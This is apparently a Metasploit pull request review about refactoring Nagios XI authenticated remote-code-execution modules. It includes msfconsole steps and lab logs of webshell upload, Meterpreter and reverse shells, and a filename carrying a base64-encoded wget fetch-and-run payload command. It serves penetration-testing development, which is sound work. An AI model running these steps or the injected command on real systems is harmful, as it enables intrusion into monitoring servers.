optimising the nagiosxi modules and also fixing the bug when autochec…

[manishkumar102317]

Improving nagiosxi authenticated modules to work with even when autocheck is disabled. This Pull Request fixes #17606 and some improvements have been performed to the below nagios authenticated modules.

• modules\exploits\linux\http\nagios_xi_autodiscovery_webshell.rb
• modules\exploits\linux\http\nagios_xi_mibs_authenticated_rce.rb
• modules\exploits\linux\http\nagios_xi_plugins_check_plugin_authenticated_rce.rb
• modules\exploits\linux\http\nagios_xi_plugins_filename_authenticated_rce.rb

The improvements that are made for the above modules are

1. Moved authentication function to its own and called it in check and exploit when necessary.
2. Used the regex advised in PR 17494
3. Refactor case statements to use accurate error codes, error messages, and Failure codes

Verification that the exploit runs when the autocheck is disabled.

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
• set RHOST <ip>
• set PASSWORD <nagios password>
• set LHOST <ip>
• set autocheck false
• run
• Verify

Here is the output

[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.6.5.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 192.168.64.11
[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.11:46570) at 2023-03-26 16:25:17 +0530
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter >

Here is the previous output

[*] Started reverse TCP handler on 192.168.64.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) >

[jheysel-r7]

Thanks for all the fixes @manishkumarr1017! Just a couple of requests / questions.

[jheysel-r7]

Suggested change

	# As affected versions are only 5.2.0 -> 5.8.4
	# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
	# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.

Please add the more detailed explanation given in the other modules here as well. I was confused as to why the version was being set to 1.0.0 until I read the above.

[manishkumar102317]

Yeah sure. I will update this on all modules.

[jheysel-r7]

I think it would make sense to add this regex string as a constant in: nagios_xi/version.rb, as it's being used by multiple modules and imo improves readability. Something like this:

# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle. The following regex is used to identify those versions. 
PRE_5_2_VERSION_REGEX = '^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$'

Suggested change

	if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
	if /#{PRE_5_2_VERSION_REGEX}/.match(nagios_version) || nagios_version == '5r1.0'

Please update the other modules in this PR to use the constant as well, thanks!

[manishkumar102317]

yeah sure. I will update this change in all modules.

[jheysel-r7]

Not asking you to do this as apart of this PR - however I've noticed now 3 out of the 4 authenticate methods in these 4 modules are now identical. With your knowledge of the different Nagios versions and their intricacies do you think moving the authenticate method to a mixin would make sense?

[manishkumar102317]

Yeah I feel that it would be good having a single common method to reduce the code repetition I feel that adding this method to the nagios mixin would be a great idea. As I have 4 out of 5 authenticate methods are identical So I will try to find a way to incorporate into 1 authenticate method. I will try to update this in this PR.

[jheysel-r7]

Suggested change

	'Reliability' => [] # fixing rubocop issues
	'Reliability' => []

I see what you mean, although I think this comment belongs more on the github PR rather than in the module itself. Either way, thanks!

[manishkumar102317]

Yeah sure. I apologise for this from next time I will add it in the PR comment rather than in the code comments. I will remove this.

[jheysel-r7]

While you're making changes to these module could you please refactor the login_result from an integer to an enum that better describes what the login result actually is? The team would really appreciate it, thank you.

[manishkumar102317]

Yeah that would be great for readability. I will do this change.

[manishkumar102317]

@jheysel-r7 I will update this PR by today and will notify you after updating.

@jheysel-r7 I have updated the PR.

[jheysel-r7]

Hey @manishkumarr1017 thanks so much for making the requested changes. They look great. I've tested all the modules and will land this now.

msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg rhosts 192.168.123.218
rhosts => 192.168.123.218
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > setg lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.7.5
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (1017704 bytes) to 192.168.123.218
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/BFhqxPERHML.php
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.218:53172) at 2023-04-14 15:29:41 -0400

meterpreter > getuid
Server username: apache
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.123.218 - Meterpreter session 1 closed.  Reason: User exit

msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.218:53366) at 2023-04-14 15:50:54 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
^C
Abort session 2? [y/N]  y

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.123.1:8080/OSXhkFYJze3TDNQ
[*] Client 192.168.123.218 (Wget/1.14 (linux-gnu)) requested /OSXhkFYJze3TDNQ
[*] Sending payload to 192.168.123.218 (Wget/1.14 (linux-gnu))
[*] Sending stage (1017704 bytes) to 192.168.123.218
[*] Command Stager progress - 100.00% done (121/121 bytes)
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9GbkZIZUNobCBodHRwOi8vMTkyLjE2OC4xMjMuMTo4MDgwL09TWGhrRllKemUzVEROUTtjaG1vZCAreCAvdG1wL0ZuRkhlQ2hsOy90bXAvRm5GSGVDaGw7cm0gLWYgL3RtcC9GbkZIZUNobA== | base64 -d | bash;#
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.218:53406) at 2023-04-14 15:54:55 -0400
[*] Server stopped.

meterpreter > getuid
Server username: apache
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >


msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.

[jheysel-r7]

Release Notes

This PR fixes the nagiosxi authenticated modules to work with even when autocheck is disabled as well as refactors reusable code.